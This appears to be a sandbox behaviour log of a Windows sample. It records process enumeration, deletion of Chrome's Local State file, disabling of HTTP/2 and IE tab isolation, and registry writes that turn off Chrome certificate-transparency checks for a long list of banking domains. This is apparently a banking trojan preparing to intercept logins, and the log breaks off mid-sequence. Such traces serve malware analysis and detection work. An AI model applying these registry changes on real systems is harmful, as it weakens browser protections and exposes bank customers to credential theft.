Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Registry	Write Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = EnableHTTP2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Write Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\, value_name = TabProcGrowth, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
File	Delete	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Local State	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 1, data = secure., size = 7, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 2, data = www.cibc.com, size = 12, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 3, data = cibc.com, size = 8, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 4, data = www.cibconline.cibc.com, size = 23, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 5, data = cibconline.cibc.com, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 6, data = intellix.capitalonebank.com, size = 27, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 7, data = businessonline.huntington.com, size = 29, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 8, data = onlinebanking.mtb.com, size = 21, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 9, data = online.lloydsbank.co.uk, size = 23, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 10, data = secure.lloydsbank.co.uk, size = 23, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 11, data = onlinebanking.afcu.org, size = 22, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 12, data = www.altraonline.org, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 13, data = altraonline.org, size = 15, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 14, data = portal.discover.com, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 15, data = signon.navyfederal.org, size = 22, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 16, data = myaccounts.navyfederal.org, size = 26, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 17, data = www.navyfederal.org, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 18, data = navyfederal.org, size = 15, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 19, data = my.navyfederal.org, size = 18, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 20, data = chaseonline.chase.com, size = 21, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 21, data = espanol.chase.com, size = 17, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 22, data = secure, size = 6, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 23, data = m.chase.com, size = 11, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 24, data = www.chase.com, size = 13, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 25, data = chase.com, size = 9, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 26, data = web, size = 3, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 27, data = myapps.paychex.com, size = 18, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 28, data = vacu.onlinebank.com, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 29, data = securentrycorp.nbarizona.com, size = 28, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 30, data = ola.cu1.org, size = 11, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 31, data = invest.ameritrade.com, size = 21, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 32, data = www.choicehotels.com, size = 20, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 33, data = choicehotels.com, size = 16, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 34, data = onepass.regions.com, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 35, data = accweb.mouv.desjardins.com, size = 26, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 36, data = accesd.mouv.desjardins.com, size = 26, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 37, data = secure.ally.com, size = 15, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 38, data = www.ally.ccservicing.com, size = 24, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 39, data = ally.ccservicing.com, size = 20, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 40, data = www.ally.com, size = 12, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 41, data = ally.com, size = 8, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
